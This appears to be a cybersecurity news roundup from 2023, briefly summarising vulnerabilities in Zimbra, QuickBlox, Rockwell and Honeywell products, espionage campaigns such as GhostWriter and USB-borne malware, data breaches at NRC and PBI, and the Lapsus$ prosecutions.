The latest in cybersecurity: Rockwell, QuickBlox, Zimbra, Honeywell, GhostWriter, Ukraine, GitHub, NRC, PBI, MOVEit, Nigeria, iPhone ban, Russia, Lapsus$, USB.
Researchers from Claroty Team82 and CheckPoint Research (CPR) have uncovered critical vulnerabilities in the widely used QuickBlox SDK and API. These vulnerabilities pose a significant risk to industries such as telemedicine, smart IoT, and finance, potentially exposing sensitive user information. The researchers developed proof-of-concept exploits that demonstrated the ability to remotely open doors, leak patient data, and compromise user credentials.
Zimbra Collaboration Suite (ZCS), a widely adopted email and collaboration platform, is facing an actively exploited zero-day vulnerability that targets and compromises email servers. Over 200,000 businesses across 140 countries, including government and financial organizations, are currently using ZCS. The vulnerability, a reflected Cross-Site Scripting (XSS) flaw, was discovered while being exploited in a targeted attack, enabling threat actors to steal sensitive user information or execute malicious code.
Government entities, military organizations, and civilian users in Ukraine and Poland have fallen victim to a series of sophisticated campaigns aimed at stealing sensitive data and establishing persistent remote access to compromised systems. The attackers, known as GhostWriter, utilize phishing tactics and decoy documents to distribute PicassoLoader malware, which serves as a conduit for launching Cobalt Strike Beacon and njRAT. The attacks involve multi-stage infection chains initiated through malicious Microsoft Office documents and employ various evasion techniques, including embedding payloads in image files. GhostWriter’s activities align with the priorities of the Belarusian government and have been ongoing since April 2022.
A proof-of-concept (PoC) found on GitHub has been discovered to contain a backdoor with a crafty persistence method, posing as a harmless learning tool. The PoC disguises itself as a downloader and executes a Linux bash script, operating at the kernel-level to conceal its malicious activities. The repository initially posed as a PoC for a recently disclosed Linux kernel flaw but was eventually taken down after being forked 25 times.
An advanced persistent threat (APT) group has identified vulnerabilities in Rockwell Automation products that could potentially disrupt critical infrastructure organizations. The flaws, CVE-2023-3595 and CVE-2023-3596, affect ControlLogix EtherNet/IP communication modules and can enable remote code execution and denial-of-service attacks. Rockwell Automation has released firmware patches and shared indicators of compromise, while the US Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory to raise awareness about the vulnerabilities. Although no exploitation has been detected, the potential risk to critical infrastructure remains a concern.
Cybersecurity company Armis has uncovered critical vulnerabilities in Honeywell’s distributed control system (DCS) products, posing a risk to industrial organizations. The nine vulnerabilities, dubbed ‘Crit.IX,’ were disclosed by Armis researchers and subsequently patched by Honeywell. The flaws, which impact various Experion DCS platforms, could allow attackers to launch denial-of-service attacks, gain unauthorized access to sensitive information, or execute remote code on controllers and servers, potentially leading to production downtime or damage to industrial equipment. Armis previously identified vulnerabilities in other ICS products, emphasizing the need for robust security measures in industrial environments.
The Norwegian Refugee Council (NRC) has revealed that it experienced a cyberattack targeting its online database containing personal information of project participants. The NRC swiftly suspended the database and initiated an external forensic investigation to assess the extent of the attack. While specific details of the attack and the perpetrators remain undisclosed, the NRC emphasized the importance of safeguarding the data of vulnerable individuals in need of humanitarian assistance.
Pension Benefit Information, LLC (PBI) recently disclosed a data breach that occurred due to a vulnerability in their MOVEit file-transfer software. Unauthorized access resulted in the exposure of sensitive consumer information, including names, addresses, Social Security numbers, and dates of birth. PBI has taken swift action, notifying affected individuals and initiating an investigation into the incident. If you have received a data breach notification from PBI, it is crucial to understand the risks involved and take appropriate measures to protect yourself from potential fraud or identity theft.
The Bangkok Post, along with numerous internet service users, fell victim to a rare ransomware attack, resulting in the inaccessibility of their website. Internet Thailand (Inet) Plc, the service provider, reported the attack on its hypervisor management system, impacting 300 out of its 2,500 clients. Inet is working diligently to restore services to all affected parties by the end of Wednesday.
The official website of the Ogun state government in Nigeria fell victim to a cyberattack conducted by hackers claiming to be from the Maldives. The attack, which was discovered on Wednesday, resulted in the defacement of all website pages. The hackers, going by the name “Anon Ghost,” left their mark by displaying their logo and a bold inscription on the compromised site.
The Russian government is contemplating a ban on the use of iPhones by government employees following suspicions of an American intelligence campaign exploiting vulnerabilities to spy on Russian staff. The ban, set to commence on Monday, will initially affect employees at the Ministry of Industry and Trade, with other government departments to follow suit. The move comes after the discovery of thousands of iPhones infected with spyware, leading to accusations of collaboration between Apple and the U.S. National Security Agency.
The Office of the National Cyber Director (ONCD) has released a comprehensive implementation plan for its ambitious national cybersecurity strategy. The plan outlines specific initiatives and deadlines for 18 government agencies, aiming to strengthen cybersecurity regulation, enhance corporate responsibility, combat cybercrime, and build a skilled cyber workforce.
A new report by Mandiant reveals a significant rise in USB-delivered malware, with two major campaigns named ‘Sogu’ and ‘Snowydrive’ observed in 2023. These campaigns, attributed to threat groups TEMP.HEX and UNC4698, respectively, target industries worldwide, aiming to steal sensitive data. The Sogu campaign, considered the most aggressive USB-assisted cyber-espionage operation, has victims across various sectors and countries. The malware, known as ‘Korplug,’ establishes persistence, conducts system reconnaissance, and exfiltrates valuable files to a command-and-control server. Additionally, the Snowydrive campaign infects computers through a backdoor, allowing attackers to execute arbitrary payloads, modify the registry, and propagate through USB drives.
The current acting director of the Office of the National Cyber Director (ONCD) has been informed that she will not receive the nomination for the permanent position, raising concerns about the agency’s effectiveness and influence. Kemba Walden, who has played a crucial role in establishing the ONCD, received the news recently, leaving the agency’s leadership in uncertainty. The decision comes after the departure of Chris Inglis, the first National Cyber Director, and Rob Knake, the deputy director overseeing the national cybersecurity strategy.
British prosecutors have accused two teenagers, identified as Arion Kurtaj and an unnamed 17-year-old, of hacking into companies such as Revolut, Uber, and Rockstar as part of the now-inactive Lapsus$ hacking group. The hackers exposed personal data of thousands of Revolut users and leaked unreleased game footage from Rockstar. The duo also targeted Microsoft, Nvidia Corp., Okta, and conducted cryptocurrency scams using fraudulent SIM cards. With their IP addresses traced, the teenagers now face charges including blackmail, fraud, and violations under the Computer Misuse Act.